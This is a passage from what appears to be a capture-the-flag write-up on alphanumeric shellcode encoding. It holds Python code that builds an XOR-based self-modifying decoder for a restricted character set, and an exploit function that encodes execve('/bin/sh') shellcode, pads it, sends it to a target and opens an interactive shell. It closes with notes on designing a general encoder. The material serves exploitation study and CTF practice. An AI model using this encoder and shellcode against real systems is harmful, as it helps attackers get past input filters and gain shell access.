            # rdx' + disp[i] = baseaddr + i*4
            # rdx' = baseaddr + i*4 - disp[i]
            # distance = rdx' - rdx
            max_distance = baseaddr + i*4 - disps[0] - rdx
            for j in range(1, len(disps)):
                distance = baseaddr + i*4 - disps[j] - rdx
                next_info = ptr_next(rdx, distance, xor_lookup)
                if distance <= max_distance:
                    decoder += next_info[1]
                    rdx += next_info[0]
                    rax = rdx
                    disp = baseaddr + i*4 - rdx
                    break
        snippet = generator[i*4:(i+1)*4]
        word = unpack_code(snippet, 4*8)
        diff = rxor(rax, word)
        xor_operands = get_xor_operands(rax, word, 4*8, xor_lookup)
        if not xor_operands:
            xor2_operands = get_xor_operands(rax, word, 4*8, xor2_lookup)
            imm = xor2_operands[0]
            decoder += asm(f"xor eax, {imm}")
            words = [b"", b""]
            for byte in pack(xor2_operands[1], 4*8):
                byte_operands = get_xor_byte(byte, xor_lookup)
                words[0] += bytes([byte_operands[0]])
                words[1] += bytes([byte_operands[1]])
            for word in words:
                imm = unpack(word, 4*8)
                decoder += asm(f"xor eax, {imm}")
        else:
            for operand in xor_operands:
                imm = operand
                decoder += asm(f"xor eax, {imm}")
        decoder += asm(f"xor dword ptr [rdx+{disp}], eax")
        rax ^= diff
    # avoid side effect of \x00
    distance = 0x10000 - rdx
    next_info = ptr_next(rdx, distance, xor_lookup)
    decoder += next_info[1]
    return decoder
def exp():
    alphabet = set(b'15aABCDEFGHIJKLMNOPQRSUVWXYZ')
    shellcode = """
    mov rbx, 0x68732f6e69622f
    push rbx
    mov rdi, rsp
    xor rsi, rsi
    xor rdx, rdx
    push 0x3b
    pop rax
    syscall
    """
    shellcode = encode(shellcode, alphabet)
    while len(shellcode) < 0x200:
        shellcode += get_nop()
    # z()
    # print(shellcode)
    io.send(shellcode)
    io.interactive()
if __name__ == '__main__':
    exp()
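Summary
- Use the data-modifying instructions in the usable set to expand to a larger instruction set
- Pick suitable registers and suitable instructions
- \x00 bytes in memory disassemble as add byte ptr [rax], al, which segfaults if rax points to a non-writable address
- Implementation ideas for a general-purpose encoder
  - Simulate the assembly environment
    - track register values and similar state
    - map instructions to character sets
    - map assembly instructions to basic operations and work out their inverses
  - Choose a suitable encoding model
    - decoder + encoded instructions (more general)
    - layered instruction decoding (more flexible)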